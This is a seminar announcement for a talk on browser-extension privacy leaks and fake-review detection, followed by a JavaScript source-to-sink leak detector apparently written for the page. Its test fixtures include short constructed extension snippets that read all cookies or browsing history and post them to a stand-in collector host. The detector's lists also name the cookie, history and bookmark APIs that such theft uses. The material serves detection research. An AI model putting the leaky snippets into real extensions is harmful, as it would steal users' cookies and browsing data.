Professor Andrei Sabelfeld - Digital Security
Date: - Location: Eurecom
Abstract: Browser extensions put millions of users at risk when they misuse their elevated privileges. Despite the current practice of semi-automated code vetting, malicious extensions still thrive in the official stores. This talk presents recent work on two critical threats in the browser extension ecosystem: privacy leaks and reputation manipulation.

First, we introduce CodeX, a CodeQL-driven static analysis framework for analyzing browser extensions. CodeX uncovers privacy violations in real-world extensions that leak cookies, browsing history, and bookmarks. Our empirical study exposes 212 privacy-violating extensions, impacting up to 3.6M users.

Next, we present FakeX, a framework for detecting fake review campaigns designed to manipulate extension reputations and evade store defenses. FakeX incorporates temporal distribution analysis, relationship clustering, and ratio-based assessment of reviews. By analyzing over 1.7 million reviews, FakeX exposes sophisticated fake review networks and leads to the discovery of 86 malicious extensions, mounting attacks that range from data stealing to monetization and impacting over 64 million users. In addition, we collaborate with Adblock Plus and Avast to demonstrate FakeX in action, expanding a seed list of newly detected malicious extensions to discover a further 16 malicious extensions with millions of users.

The talk is based on papers published in ASIACCS'24 (joint work with E. Olsson, B. Eriksson, P. Picazo-Sanchez, and L. Andersson) and CODASPY'25 (joint work with M. Ahmadpanah, M. Gobbi, D. Hedin, and J. Kinder).

Short bio: Andrei Sabelfeld is Professor at Chalmers University of Technology, Visiting Professor at KTH, and, previously, Researcher at Cornell University in Ithaca, NY, USA. Andrei's research spans from foundations to applications in a range of topics including software security, web security, IoT security, security foundations, and applied cryptography. He is a recipient of a number of prestigious prizes and awards from ERC, KAW, SSF, VR, WASP, Chalmers, Google, Amazon, Meta (Facebook), and OpenAI.
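The leak pattern CodeX hunts for, an extension reading cookies, history or bookmarks through a privileged API and shipping the result to a remote server, can be illustrated with a small source-to-sink scan over extension script text. The JavaScript below is an added example written for this page; it is not CodeX, not a CodeQL query, and not code from the papers or the speaker. It matches a handful of regexes on a single script and propagates taint one simple assignment at a time, so it is a demonstration of the idea, not a substitute for AST-based data-flow analysis. The source and sink lists, the three sample extension snippets and the collector URLs in them are all constructed for the demonstration.

```javascript
"use strict";

// Privacy-sensitive extension APIs (sources) and network calls (sinks).
// Both lists are illustrative assumptions for this example, not CodeX's.
const SOURCES = [
  "chrome.cookies.getAll", "chrome.history.search", "chrome.bookmarks.getTree",
  "browser.cookies.getAll", "browser.history.search", "browser.bookmarks.getTree",
];
const SINKS = [
  { name: "fetch", re: /\bfetch\s*\(/g },
  { name: "navigator.sendBeacon", re: /\bsendBeacon\s*\(/g },
  { name: "XMLHttpRequest.send", re: /\.send\s*\(/g },
];

function esc(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); }

// Text between the parenthesis at index `open` and its matching close,
// skipping nested parentheses and quoted strings.
function argText(src, open) {
  let depth = 0, quote = null;
  for (let i = open; i < src.length; i++) {
    const c = src[i];
    if (quote) { if (c === "\\") i++; else if (c === quote) quote = null; continue; }
    if (c === '"' || c === "'" || c === "`") quote = c;
    else if (c === "(") depth++;
    else if (c === ")" && --depth === 0) return src.slice(open + 1, i);
  }
  return src.slice(open + 1);
}

// Variables that directly receive a source's result: `const x = await src(...)`,
// a callback parameter `src(..., function (x)` / `src(..., (x) =>`, or `.then(x =>`.
function seedTaint(src) {
  const taint = new Map(); // variable name -> originating source API
  for (const api of SOURCES) {
    const a = esc(api);
    const patterns = [
      new RegExp(`(?:const|let|var)\\s+(\\w+)\\s*=\\s*await\\s+${a}\\s*\\(`, "g"),
      new RegExp(`${a}\\s*\\((?:[^()]*,)?\\s*(?:function\\s*\\(\\s*(\\w+)|\\(?\\s*(\\w+)\\s*\\)?\\s*=>)`, "g"),
      new RegExp(`${a}\\s*\\([^()]*\\)\\s*\\.then\\s*\\(\\s*(?:function\\s*\\(\\s*(\\w+)|\\(?\\s*(\\w+)\\s*\\)?\\s*=>)`, "g"),
    ];
    for (const re of patterns) {
      for (const m of src.matchAll(re)) {
        const name = m[1] || m[2] || m[3];
        if (name) taint.set(name, api);
      }
    }
  }
  return taint;
}

// Propagate taint through simple declarations such as
// `const payload = JSON.stringify(cookies);` until nothing new is found.
function propagate(src, taint) {
  let changed = true;
  while (changed) {
    changed = false;
    for (const m of src.matchAll(/(?:const|let|var)\s+(\w+)\s*=([^;]*);/g)) {
      if (taint.has(m[1])) continue;
      for (const [name, api] of taint) {
        if (new RegExp(`\\b${name}\\b`).test(m[2])) { taint.set(m[1], api); changed = true; break; }
      }
    }
  }
  return taint;
}

// Report every sink call whose argument text mentions a tainted variable.
function findLeaks(src) {
  const taint = propagate(src, seedTaint(src));
  const leaks = [];
  for (const sink of SINKS) {
    for (const m of src.matchAll(sink.re)) {
      const args = argText(src, m.index + m[0].length - 1);
      for (const [name, api] of taint) {
        if (new RegExp(`\\b${name}\\b`).test(args)) leaks.push({ source: api, variable: name, sink: sink.name });
      }
    }
  }
  return leaks;
}

// Constructed sample extension scripts (not real extensions).
const LEAKY_COOKIES = `
chrome.cookies.getAll({}, function (cookies) {
  const payload = JSON.stringify(cookies);
  fetch("https://collector.example/upload", { method: "POST", body: payload });
});
`;
const LEAKY_HISTORY = `
async function sync() {
  const items = await chrome.history.search({ text: "", maxResults: 1000 });
  navigator.sendBeacon("https://collector.example/h", JSON.stringify(items));
}
`;
const BENIGN = `
chrome.cookies.getAll({ domain: "example.com" }, (cookies) => {
  document.getElementById("count").textContent = cookies.length;
});
fetch("https://api.example.com/config").then(r => r.json());
`;

console.log(findLeaks(LEAKY_COOKIES), findLeaks(LEAKY_HISTORY), findLeaks(BENIGN));
```

The benign script reads cookies too, which is why a permission-based or API-presence check alone would flag it; the distinguishing signal is the flow from the privileged read into a network sink, and that flow is what a real data-flow analysis such as the CodeQL-based one described in the talk tracks across functions, objects and message passing, which this regex sketch does not.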